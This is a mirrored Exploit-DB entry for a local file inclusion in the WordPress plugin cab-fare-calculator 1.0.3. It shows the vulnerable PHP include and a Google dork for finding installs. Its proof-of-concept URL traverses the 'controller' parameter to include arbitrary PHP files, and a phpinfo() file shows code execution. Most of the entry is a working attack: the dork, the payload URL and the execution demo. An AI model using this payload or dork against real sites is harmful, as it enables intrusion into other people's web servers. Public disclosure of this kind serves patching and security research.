bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/50843.txt
Offensive Security 54b7907ae6 DB: 2022-03-31 
11 changes to exploits/shellcodes

PostgreSQL 9.3-11.7 - Remote Code Execution (RCE) (Authenticated)
Kramer VIAware 2.5.0719.1034 - Remote Code Execution (RCE)
ImpressCMS 1.4.2 - Remote Code Execution (RCE)
Atom CMS 2.0 - Remote Code Execution (RCE)
Drupal avatar_uploader v7.x-1.0-beta8 - Cross Site Scripting (XSS)
WordPress Plugin Curtain 1.0.2 - Cross-site Request Forgery (CSRF)
WordPress Plugin cab-fare-calculator 1.0.3 - Local File Inclusion
WordPress Plugin video-synchro-pdf 1.7.4 - Local File Inclusion
WordPress Plugin admin-word-count-column 2.2 - Local File Read
CSZ CMS 1.2.9 - 'Multiple' Blind SQLi(Authenticated)
WordPress Plugin Easy Cookie Policy 1.6.2 - Broken Access Control to Stored XSS
2022-03-31 05:01:38 +00:00

32 lines
No EOL
854 B
Text
Raw Blame History

# Exploit Title: WordPress Plugin cab-fare-calculator 1.0.3 - Local File Inclusion
# Google Dork: inurl:/wp-content/plugins/cab-fare-calculator/
# Date: 24-03-2022
# Exploit Author: Hassan Khan Yusufzai - Splint3r7
# Vendor Homepage: https://wordpress.org/plugins/cab-fare-calculator/
# Version: 1.0.3
# Tested on: Firefox
# Vulnerable File: tblight.php
# Impact:
Local File Read / Code Execution
# Vulnerable Code:
```
if(!empty($_GET['controller']) && !empty($_GET['action']) &&
!empty($_GET['ajax']) && $_GET['ajax'] == 1)
{
require_once('' . 'controllers/'.$_GET['controller'].'.php');
}
```
# Proof of concept:
http://localhost:10003/wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/index&action=1&ajax=1
# POC Code Execution:
/etc/index.php:
<?php echo "Local file read"; phpinfo(); ?>
Reference in a new issue View git blame Copy permalink